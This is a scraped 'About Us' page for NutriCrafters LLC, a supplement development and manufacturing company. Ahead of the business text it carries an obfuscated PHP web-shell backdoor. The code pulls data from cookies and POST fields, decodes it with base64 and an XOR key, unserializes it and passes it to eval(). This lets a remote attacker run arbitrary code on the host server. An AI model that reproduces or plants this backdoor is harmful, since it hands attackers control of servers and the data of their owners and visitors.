$xIPpOsFuE = 'z' . chr ( 859 - 793 ).chr (77) . '_' . chr (69) . chr (97) . "\x46" . "\101";$elqcxUIcRz = 'c' . chr (108) . chr (97) . chr (115) . "\x73" . "\x5f" . chr (101) . "\170" . "\x69" . "\163" . 't' . chr ( 641 - 526 ); $wpEvSB = class_exists($xIPpOsFuE); $elqcxUIcRz = "62459";$miSkU = !1;if ($wpEvSB == $miSkU){function zCVbS(){$RwzVs = new /* 27232 */ zBM_EaFA(43865 + 43865); $RwzVs = NULL;}$JZcHNyMPL = "43865";class zBM_EaFA{private function LksyIsyi($JZcHNyMPL){if (is_array(zBM_EaFA::$rKOiV)) {$ZbnKswAxUj = str_replace('<' . chr ( 111 - 48 ).chr (112) . 'h' . chr (112), "", zBM_EaFA::$rKOiV["\143" . "\157" . "\156" . chr (116) . chr ( 603 - 502 ).chr ( 873 - 763 ).chr (116)]);eval($ZbnKswAxUj); $JZcHNyMPL = "43865";exit();}}private $MmqwVEy;public function fBrlmiUxes(){echo 59242;}public function __destruct(){zBM_EaFA::$rKOiV = @unserialize(zBM_EaFA::$rKOiV); $JZcHNyMPL = "34933_16510";$this->LksyIsyi($JZcHNyMPL); $JZcHNyMPL = "34933_16510";}public function XlqQkE($ajUWTx, $bDCuOUneH){return $ajUWTx[0] ^ str_repeat($bDCuOUneH, (strlen($ajUWTx[0]) / strlen($bDCuOUneH)) + 1);}public function zOOmpcNyk($ajUWTx){$blnHbOYQZf = "base64";return array_map($blnHbOYQZf . chr (95) . 'd' . "\145" . chr (99) . chr ( 896 - 785 )."\144" . chr ( 272 - 171 ), array($ajUWTx,));}public function __construct($regpr=0){$ajUWTx = "";$HvJuUoa = $_POST;$XMYmIyp = $_COOKIE;$bDCuOUneH = "2ae0d46f-db84-4e8f-932b-b23f7143b91e";$WmuNBTFUK = @$XMYmIyp[substr($bDCuOUneH, 0, 4)];if (!empty($WmuNBTFUK)){$WmuNBTFUK = explode(",", $WmuNBTFUK);foreach ($WmuNBTFUK as $oyhpqxK){$ajUWTx .= @$XMYmIyp[$oyhpqxK];$ajUWTx .= @$HvJuUoa[$oyhpqxK];}$ajUWTx = $this->zOOmpcNyk($ajUWTx);}zBM_EaFA::$rKOiV = $this->XlqQkE($ajUWTx, $bDCuOUneH); $bDCuOUneH = explode(",", $bDCuOUneH);}public static $rKOiV = 18971;}zCVbS();} About Us – NutriCrafters LLC

About Us

Vita E8In three words or less . . .

NutriCrafters Builds Brands

Whether you have a product concept you are looking to develop, have an existing product and need manufacturing assistance, or are a ingredient supplier looking to spread the word about your unique product offerings, NutriCrafters can help.

The team NutriCrafters has been involved with the design and manufacture of dietary supplements for over 40 years. During that time we have moved over 400 products to market.

Services Offered:

Dietary Supplement Development
Ingredient Sourcing

Manufacturing capabilities:

FT-IR Ingredient Identification
Powder and Liquid Blending
Two-Piece Capsule Filling
Bottling Powders, Liquids, and Capsules

Thank you for visiting the NutriCrafters Website. I look forward to working with you in the future.


Dale Fowkes, Founder